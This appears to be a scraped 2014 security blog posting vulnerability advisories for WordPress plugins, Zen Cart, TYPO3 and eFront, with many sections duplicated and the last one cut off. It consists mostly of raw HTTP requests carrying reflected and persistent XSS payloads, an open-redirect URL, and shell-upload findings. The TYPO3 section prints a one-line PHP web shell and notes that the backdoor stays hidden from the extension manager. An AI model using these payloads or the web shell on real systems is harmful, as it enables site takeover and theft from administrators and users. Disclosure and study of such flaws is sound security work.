# ==============================================================
# Title ...| Thanks You Counter Button XSS
# Version .| thanks-you-counter-button 1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 806
option_page=thankyoubutton-options&action=update&_wpnonce=ed03a9f018&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dthankyou.php&thanks_display_page=1&thanks_display_home=1&thanks_position_firstpageonly=1&thanks_position_lastpageonly=1&thanks_caption='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&thanks_style=float%3A+left%3B+margin-right%3A+10px%3B&thanks_caption_style=font-family%3A+Verdana%2C+Arial%2C+Sans-Serif%3B+font-size%3A+14px%3B+font-weight%3A+normal%3B&thanks_caption_color=%23ffffff&thanks_size=large&thanks_form=rounded&thanks_color=blue&thanks_custom_url=&thanks_custom_glow_url=&thanks_custom_width=100&thanks_custom_height=26&thanks_check_ip_address=1&thanks_time_limit%5B%5D=1&thanks_time_limit_seconds=60&thanks_display_settings_shortcuts=1&submit=Save+Changes
---<request>---
[+] Also vulnerable are: thanks_caption_style, thanks_style
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Tuesday, 25 February 2014
[EN] Wordpress plugin FeedWeb vulnerable to XSS
# ==============================================================
# Title ...| DOM-based XSS in FeedWeb
# Version .| feedweb.2.4
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.wordpress.org/plugins/
# ==============================================================
# ==============================================================
# DOM-based XSS
---<request>---
POST /k/wordpress/wp-content/plugins/feedweb/feedweb_settings.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 666
_wp_http_referer=";</script><script>alert(123)</script>&DelayResults=0&FeedwebLanguage=en&FeedwebMPWidgets=0&RatingWidgetType=H&AutoAddParagraphs=0&InsertWidgetPrompt=1&RatingWidgetLayout=wide&RatingWidgetPlacement=0&RatingWidgetColorScheme=gray&FrontWidgetItemCount=&ResultsBeforeVoting=0&FeedwebCopyrightNotice=0&FrontWidgetHideScroll=0&FrontWidgetColorScheme=classic&WidgetPlaceRadio=on&WidgetTypeSwitch=-&RatingWidgetColorSchemeBox=gray&ExternalBackgroundBox=FFFFFF&WidgetLanguageBox=en&WidgetLayoutBox=wide&WidgetWidthEdit=400&DelayResultsBox=0&WidgetPromptBox=on&FrontWidgetColorSchemeBox=classic&FrontWidgetHeightEdit=400&ItemCountBox=3&submit=Save+Changes
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| DOM-based XSS in FeedWeb
# Version .| feedweb.2.4
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.wordpress.org/plugins/
# ==============================================================
# ==============================================================
# DOM-based XSS
---<request>---
POST /k/wordpress/wp-content/plugins/feedweb/feedweb_settings.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 666
_wp_http_referer=";</script><script>alert(123)</script>&DelayResults=0&FeedwebLanguage=en&FeedwebMPWidgets=0&RatingWidgetType=H&AutoAddParagraphs=0&InsertWidgetPrompt=1&RatingWidgetLayout=wide&RatingWidgetPlacement=0&RatingWidgetColorScheme=gray&FrontWidgetItemCount=&ResultsBeforeVoting=0&FeedwebCopyrightNotice=0&FrontWidgetHideScroll=0&FrontWidgetColorScheme=classic&WidgetPlaceRadio=on&WidgetTypeSwitch=-&RatingWidgetColorSchemeBox=gray&ExternalBackgroundBox=FFFFFF&WidgetLanguageBox=en&WidgetLayoutBox=wide&WidgetWidthEdit=400&DelayResultsBox=0&WidgetPromptBox=on&FrontWidgetColorSchemeBox=classic&FrontWidgetHeightEdit=400&ItemCountBox=3&submit=Save+Changes
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Monday, 24 February 2014
[EN] Multiple XSS / Shell upload possibility in latest ZenCart
# ==============================================================
# Title ...| Multiple vulnerabilities in Zen Cart e-commerce
# Version .| zen-cart-v1.5.1-full-fileset-09182012
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================
[+] For not-authenticated user:
# ==============================================================
# 1. Redirection to any (phishing?) site:
---<request>---
10.149.14.62//k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/index.php?main_page=redirect&action=url&goto=www.google.com
---<request>---
==============================================================
[+] For admin user logged-in
# ==============================================================
# 2. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/gv_mail.php?action=preview HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
securityToken=c708c6bfb991c954612cf368ba24b1b2&customers_email_address=&email_to='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&from=admin%40here.com&subject=asd&amount=123&message=We%27re+pleased+to+offer+you+a+Gift+Certificate&x=27&y=8
---<request>---
# ==============================================================
# 3. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&coupon_name%5B1%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&coupon_desc%5B1%5D=asd&coupon_amount=123&coupon_min_order=2&coupon_free_ship=on&coupon_code=123123&coupon_uses_coupon=&coupon_uses_user=1&coupon_startdate_day=24&coupon_startdate_month=2&coupon_startdate_year=2014&coupon_finishdate_day=24&coupon_finishdate_month=2&coupon_finishdate_year=2015&coupon_zone_restriction=0&x=58&y=14
---<request>---
Also vulnerable are:
coupon_desc%5B1%5D, coupon_min_order,coupon_free_ship, coupon_code,coupon_uses_coupon, coupon_uses_user
# ==============================================================
# 4. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/developers_tool_kit.php?action=locate_configuration HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&configuration_key='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&zv_files=1&x=16&y=6
---<request>---
# ==============================================================
# 5. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&geo_zone_name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&geo_zone_description=asdasdasd&x=26&y=149
---<request>---
# ==============================================================
# 6. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&orders_status_name%5B1%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&x=29&y=10
---<request>---
# ==============================================================
# 7. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/countries.php?page=1&action=insert HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&countries_name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&countries_iso_code_2=asd&countries_iso_code_3=asdasd&address_format_id=1&x=30&y=10
---<request>---
# ==============================================================
# 8. Shell upload possibility when creating new category:
k@lab:~/public_html/cms/zen/zen-cart-v1.5.1-full-fileset-09182012$ find ./ | grep shell.php
./images/categories/mishell.php
k@lab:~/public_html/cms/zen/zen-cart-v1.5.1-full-fileset-09182012$
;)
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| Multiple vulnerabilities in Zen Cart e-commerce
# Version .| zen-cart-v1.5.1-full-fileset-09182012
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================
[+] For not-authenticated user:
# ==============================================================
# 1. Redirection to any (phishing?) site:
---<request>---
10.149.14.62//k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/index.php?main_page=redirect&action=url&goto=www.google.com
---<request>---
==============================================================
[+] For admin user logged-in
# ==============================================================
# 2. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/gv_mail.php?action=preview HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
securityToken=c708c6bfb991c954612cf368ba24b1b2&customers_email_address=&email_to='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&from=admin%40here.com&subject=asd&amount=123&message=We%27re+pleased+to+offer+you+a+Gift+Certificate&x=27&y=8
---<request>---
# ==============================================================
# 3. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&coupon_name%5B1%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&coupon_desc%5B1%5D=asd&coupon_amount=123&coupon_min_order=2&coupon_free_ship=on&coupon_code=123123&coupon_uses_coupon=&coupon_uses_user=1&coupon_startdate_day=24&coupon_startdate_month=2&coupon_startdate_year=2014&coupon_finishdate_day=24&coupon_finishdate_month=2&coupon_finishdate_year=2015&coupon_zone_restriction=0&x=58&y=14
---<request>---
Also vulnerable are:
coupon_desc%5B1%5D, coupon_min_order,coupon_free_ship, coupon_code,coupon_uses_coupon, coupon_uses_user
# ==============================================================
# 4. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/developers_tool_kit.php?action=locate_configuration HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&configuration_key='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&zv_files=1&x=16&y=6
---<request>---
# ==============================================================
# 5. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&geo_zone_name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&geo_zone_description=asdasdasd&x=26&y=149
---<request>---
# ==============================================================
# 6. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&orders_status_name%5B1%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&x=29&y=10
---<request>---
# ==============================================================
# 7. XSS
---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/countries.php?page=1&action=insert HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&countries_name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&countries_iso_code_2=asd&countries_iso_code_3=asdasd&address_format_id=1&x=30&y=10
---<request>---
# ==============================================================
# 8. Shell upload possibility when creating new category:
k@lab:~/public_html/cms/zen/zen-cart-v1.5.1-full-fileset-09182012$ find ./ | grep shell.php
./images/categories/mishell.php
k@lab:~/public_html/cms/zen/zen-cart-v1.5.1-full-fileset-09182012$
;)
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] Multiple vulnerabilities in Typo3 6.1.7
During last days I found few vulnerabilities in latest TYPO3.
Feel free to ask if you have any questions.
I will answer as soon as possible. ;)
# ==============================================================
# Title ...| Multiple vulnerabilities in Typo3 CMS
# Version .| introductionpackage-6.1.7
# Date ....| 24.02.2014
# Found ...| HauntIT Blog
# Home ....| www.typo3.org
# ==============================================================
[+] For admin user:
# ==============================================================
# 1. XSS
---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/mod.php?M=tools_txschedulerM1&CMD=edit&tx_scheduler[uid]=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 329
SET%5Bfunction%5D=scheduler&CMD=save&tx_scheduler%5Buid%5D=1&previousCMD=edit&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tx_scheduler%5Btype%5D=2&tx_scheduler%5Bstart%5D=00%3A00+01-10-2011&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=0+*+*+*+*&tx_scheduler%5Bmultiple%5D=0
---<request>---
---<response>---
Class</label></abbr></span></td><td class="td-input">
()<input type="hidden" name="tx_scheduler[class]" id="task_class" value="'>"><body/onload=alert(9999)>" />
---<response>---
# ==============================================================
# 2. Shell upload possibility
If admin is logged in he can add 'extension' in ZIP file. So there is a possibility to install webshell
located in zipped PHP file. Backdoor will be available (like) here:
---<code>---
/home/k/public_html/cms/intro/introductionpackage-6.1.7/typo3conf/ext/mishell/mishell.php:1:
<?php system($_REQUEST['cmd']);?>
---<code>---
The 'good news' (for user who hijacked admin's accout) is that the backdoor won't be visible
from Extention Manager.
# ==============================================================
# 3. Information disclosure bug
---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/mod.php?M=tools_ExtensionmanagerExtensionmanager&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Baction%5D=extract&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Bcontroller%5D=UploadExtensionFile&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Bformat%5D=json HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1986
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@extension]"
Extensionmanager
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@vendor]"
TYPO3\CMS
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@controller]"
UploadExtensionFile
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@action]"
form
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][arguments]"
YToyOntzOjY6ImFjdGlvbiI7czo0OiJmb3JtIjtzOjEwOiJjb250cm9sbGVyIjtzOjE5OiJVcGxvYWRFeHRlbnNpb25GaWxlIjt9190c41a301fed009dff796152c31d68de5be7721
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__trustedProperties]"
a:2:{s:13:"extensionFile";a:5:{s:4:"name";i:1;s:4:"type";i:1;s:8:"tmp_name";i:1;s:5:"error";i:1;s:4:"size";i:1;}s:9:"overwrite";i:1;}7b7da06281d8102e2c39d7a0d4d40655f5f5603c
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[extensionFile]"; filename="mishell.zip"
Content-Type: application/zip
blah...
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[overwrite]"
'`"%3b--#%%2f%2a
-----------------------------147561664023554--
---<request>---
And then:
---<response>---
{"success":"true","extension":null,"error":"PHP Catchable Fatal Error: Argument 1 passed to TYPO3\\CMS\\Extensionmanager\\Utility\\InstallUtility::processDatabaseUpdates() must be of the type array, null given, called in \/home\/k\/public_html\/cms\/intro\/introductionpackage-6.1.7\/typo3\/sysext\/extensionmanager\/Classes\/Utility\/InstallUtility.php on line 133 and defined in \/home\/k\/public_html\/cms\/intro\/introductionpackage-6.1.7\/typo3\/sysext\/extensionmanager\/Classes\/Utility\/InstallUtility.php line 244"}
---<response>---
# ==============================================================
# 4. DOM-based XSS
---<request>---
GET /k/cms/intro/introductionpackage-6.1.7/typo3/sysext/rtehtmlarea/mod4/select_image.php?&RTEtsConfigParams=';//</script><script>alert(132)</script>&editorNo=data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_&sys_language_content=0&contentTypo3Language=default HTTP/1.1
---<request>---
---<response>---
(...)
'|data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_:0|';//</script><script>alert(132)</script>|'); }
(...)
---<response>---
# ==============================================================
# 5. DOM-based XSS
---<request>---
GET /k/cms/intro/introductionpackage-6.1.7/typo3/sysext/rtehtmlarea/mod4/select_image.php?act=plain&bparams=|data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_:0|tx_news_domain_model_news:NEW530b1d080b773:bodytext:0:0:0:|&editorNo=data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_&sys_language_content=0&RTEtsConfigParams=tx_news_domain_model_news%3ANEW530b1d080b773%3Abodytext%3A0%3A0%3A0%3A HTTP/1.1
---<request>---
---<response>---
(...)
var plugin = window.parent.RTEarea["data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_"].editor.getPlugin("TYPO3Image");
var HTMLArea = window.parent.HTMLArea;
HTMLArea.TYPO3Image.insertElement = function (table, uid, type, filename, filePath, fileExt, fileIcon) {
return jumpToUrl('?editorNo=' + 'data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_' + '&insertImage=' + filePath + '&table=' + table + '&uid=' + uid + '&type=' + type + 'bparams=' + '|data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodyte
(...)
---<response>---
====================================================================
[+] Now for "simple_editor" user:
====================================================================
# ==============================================================
# 6. XSS
---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/tce_file.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 349
file%5Beditfile%5D%5B0%5D%5Bdata%5D=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A&target=1&file%5Beditfile%5D%5B0%5D%5Btarget%5D=180&redirect=%2Fk%2Fcms%2Fintro%2Fintroductionpackage-6.1.7%2Ftypo3%2Fmod.php%3F%26id%3D1%253A%252Fuser_upload%252Fdocuments%252Fasdasd%252F%26M%3Dfile_list%26SET%5BbigControlPanel%5D%3D1
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Feel free to ask if you have any questions.
I will answer as soon as possible. ;)
# ==============================================================
# Title ...| Multiple vulnerabilities in Typo3 CMS
# Version .| introductionpackage-6.1.7
# Date ....| 24.02.2014
# Found ...| HauntIT Blog
# Home ....| www.typo3.org
# ==============================================================
[+] For admin user:
# ==============================================================
# 1. XSS
---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/mod.php?M=tools_txschedulerM1&CMD=edit&tx_scheduler[uid]=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 329
SET%5Bfunction%5D=scheduler&CMD=save&tx_scheduler%5Buid%5D=1&previousCMD=edit&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tx_scheduler%5Btype%5D=2&tx_scheduler%5Bstart%5D=00%3A00+01-10-2011&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=0+*+*+*+*&tx_scheduler%5Bmultiple%5D=0
---<request>---
---<response>---
Class</label></abbr></span></td><td class="td-input">
()<input type="hidden" name="tx_scheduler[class]" id="task_class" value="'>"><body/onload=alert(9999)>" />
---<response>---
# ==============================================================
# 2. Shell upload possibility
If admin is logged in he can add 'extension' in ZIP file. So there is a possibility to install webshell
located in zipped PHP file. Backdoor will be available (like) here:
---<code>---
/home/k/public_html/cms/intro/introductionpackage-6.1.7/typo3conf/ext/mishell/mishell.php:1:
<?php system($_REQUEST['cmd']);?>
---<code>---
The 'good news' (for user who hijacked admin's accout) is that the backdoor won't be visible
from Extention Manager.
# ==============================================================
# 3. Information disclosure bug
---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/mod.php?M=tools_ExtensionmanagerExtensionmanager&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Baction%5D=extract&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Bcontroller%5D=UploadExtensionFile&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Bformat%5D=json HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1986
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@extension]"
Extensionmanager
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@vendor]"
TYPO3\CMS
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@controller]"
UploadExtensionFile
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@action]"
form
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][arguments]"
YToyOntzOjY6ImFjdGlvbiI7czo0OiJmb3JtIjtzOjEwOiJjb250cm9sbGVyIjtzOjE5OiJVcGxvYWRFeHRlbnNpb25GaWxlIjt9190c41a301fed009dff796152c31d68de5be7721
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__trustedProperties]"
a:2:{s:13:"extensionFile";a:5:{s:4:"name";i:1;s:4:"type";i:1;s:8:"tmp_name";i:1;s:5:"error";i:1;s:4:"size";i:1;}s:9:"overwrite";i:1;}7b7da06281d8102e2c39d7a0d4d40655f5f5603c
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[extensionFile]"; filename="mishell.zip"
Content-Type: application/zip
blah...
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[overwrite]"
'`"%3b--#%%2f%2a
-----------------------------147561664023554--
---<request>---
And then:
---<response>---
{"success":"true","extension":null,"error":"PHP Catchable Fatal Error: Argument 1 passed to TYPO3\\CMS\\Extensionmanager\\Utility\\InstallUtility::processDatabaseUpdates() must be of the type array, null given, called in \/home\/k\/public_html\/cms\/intro\/introductionpackage-6.1.7\/typo3\/sysext\/extensionmanager\/Classes\/Utility\/InstallUtility.php on line 133 and defined in \/home\/k\/public_html\/cms\/intro\/introductionpackage-6.1.7\/typo3\/sysext\/extensionmanager\/Classes\/Utility\/InstallUtility.php line 244"}
---<response>---
# ==============================================================
# 4. DOM-based XSS
---<request>---
GET /k/cms/intro/introductionpackage-6.1.7/typo3/sysext/rtehtmlarea/mod4/select_image.php?&RTEtsConfigParams=';//</script><script>alert(132)</script>&editorNo=data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_&sys_language_content=0&contentTypo3Language=default HTTP/1.1
---<request>---
---<response>---
(...)
'|data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_:0|';//</script><script>alert(132)</script>|'); }
(...)
---<response>---
# ==============================================================
# 5. DOM-based XSS
---<request>---
GET /k/cms/intro/introductionpackage-6.1.7/typo3/sysext/rtehtmlarea/mod4/select_image.php?act=plain&bparams=|data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_:0|tx_news_domain_model_news:NEW530b1d080b773:bodytext:0:0:0:|&editorNo=data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_&sys_language_content=0&RTEtsConfigParams=tx_news_domain_model_news%3ANEW530b1d080b773%3Abodytext%3A0%3A0%3A0%3A HTTP/1.1
---<request>---
---<response>---
(...)
var plugin = window.parent.RTEarea["data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_"].editor.getPlugin("TYPO3Image");
var HTMLArea = window.parent.HTMLArea;
HTMLArea.TYPO3Image.insertElement = function (table, uid, type, filename, filePath, fileExt, fileIcon) {
return jumpToUrl('?editorNo=' + 'data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_' + '&insertImage=' + filePath + '&table=' + table + '&uid=' + uid + '&type=' + type + 'bparams=' + '|data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodyte
(...)
---<response>---
====================================================================
[+] Now for "simple_editor" user:
====================================================================
# ==============================================================
# 6. XSS
---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/tce_file.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 349
file%5Beditfile%5D%5B0%5D%5Bdata%5D=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A&target=1&file%5Beditfile%5D%5B0%5D%5Btarget%5D=180&redirect=%2Fk%2Fcms%2Fintro%2Fintroductionpackage-6.1.7%2Ftypo3%2Fmod.php%3F%26id%3D1%253A%252Fuser_upload%252Fdocuments%252Fasdasd%252F%26M%3Dfile_list%26SET%5BbigControlPanel%5D%3D1
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] CMSMadeSimple 1.11.10 Cross Site Scripting
Thanks to PacketStormSecurity portal, we can see that my another
finding is publicly available ;)
All details you will find here.
finding is publicly available ;)
All details you will find here.
[EN] eFront 3.6.14 Multiple vulnerabilities
Below few findings from yesterday and today...
# ==============================================================
# Title ...| eFront 3.6.14 Multiple vulnerabilities
# Version .| efront_3.6.14_build18016_community.zip
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| www.efrontlearning.net/download
# ==============================================================
# ==============================================================
# 1. Information disclosure
---<request>---
POST /k/cms/efront/www/student.php?ctg=personal&user='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&op=profile HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1975
-----------------------------2032284762831
Content-Disposition: form-data; name="_qf__user_form"
(...)
---<request>---
---<response>---
($('secondlist')) {Sortable.destroy('secondlist');}">
<pre>#0 /home/k/public_html/cms/efront/libraries/includes/personal.php(29): EfrontUserFactory::factory(''>">')
#1 /home/k/public_html/cms/efront/www/student.php(554): include('/home/k/public_...')
#2 {main}</pre>
---<response>---
# ==============================================================
# 2. Persistent XSS (from admin)
---<request>---
POST /k/cms/efront/www/administrator.php?ctg=courses&add_course=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 269
_qf__add_courses_form=&qfS_csrf=c43145eed7151535528a08cf6281dc40&qfS_csrf=c43145eed7151535528a08cf6281dc40&name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&directions_ID=1&languages_NAME=english&active=0&active=1&show_catalog=0&show_catalog=1&price=0&submit_course=Submit
---<request>---
# ===============================================================
# 3. Persistent XSS (again from admin, and again vulnerable is 'name' parameter)
---<request>---
POST /k/cms/efront/www/administrator.php?ctg=directions&add_direction=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 169
_qf__add_directions_form=&qfS_csrf=bcc380e9b626466a1f0829bc96174833&name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&parent_direction_ID=0&submit_direction=Submit
---<request>---
# ===============================================================
# 4. Persistent xss (name parameter again)
---<request>---
POST /k/cms/efront/www/administrator.php?ctg=user_types&add_user_type=1&basic_type=student HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 607
_qf__add_type_form=&qfS_csrf=9c7ab093513d78bf919b45393b618564&name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&basic_user_type=student&core_access%5Bcontent%5D=change&core_access%5Busers%5D=change&core_access%5Bstatistics%5D=change&core_access%5Bpersonal_messages%5D=change&core_access%5Bcontrol_panel%5D=change&core_access%5Bmove_block%5D=change&core_access%5Bmodule_itself%5D=change&core_access%5Bdashboard%5D=change&core_access%5Binsert_group_key%5D=change&core_access%5Bcalendar%5D=change&core_access%5Bsurveys%5D=change&core_access%5Bnews%5D=change&core_access%5Bforum%5D=change&submit_type=Save
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# ==============================================================
# Title ...| eFront 3.6.14 Multiple vulnerabilities
# Version .| efront_3.6.14_build18016_community.zip
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| www.efrontlearning.net/download
# ==============================================================
# ==============================================================
# 1. Information disclosure
---<request>---
POST /k/cms/efront/www/student.php?ctg=personal&user='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&op=profile HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1975
-----------------------------2032284762831
Content-Disposition: form-data; name="_qf__user_form"
(...)
---<request>---
---<response>---
($('secondlist')) {Sortable.destroy('secondlist');}">
<pre>#0 /home/k/public_html/cms/efront/libraries/includes/personal.php(29): EfrontUserFactory::factory(''>">')
#1 /home/k/public_html/cms/efront/www/student.php(554): include('/home/k/public_...')
#2 {main}</pre>
---<response>---
# ==============================================================
# 2. Persistent XSS (from admin)
---<request>---
POST /k/cms/efront/www/administrator.php?ctg=courses&add_course=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 269
_qf__add_courses_form=&qfS_csrf=c43145eed7151535528a08cf6281dc40&qfS_csrf=c43145eed7151535528a08cf6281dc40&name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&directions_ID=1&languages_NAME=english&active=0&active=1&show_catalog=0&show_catalog=1&price=0&submit_course=Submit
---<request>---
# ===============================================================
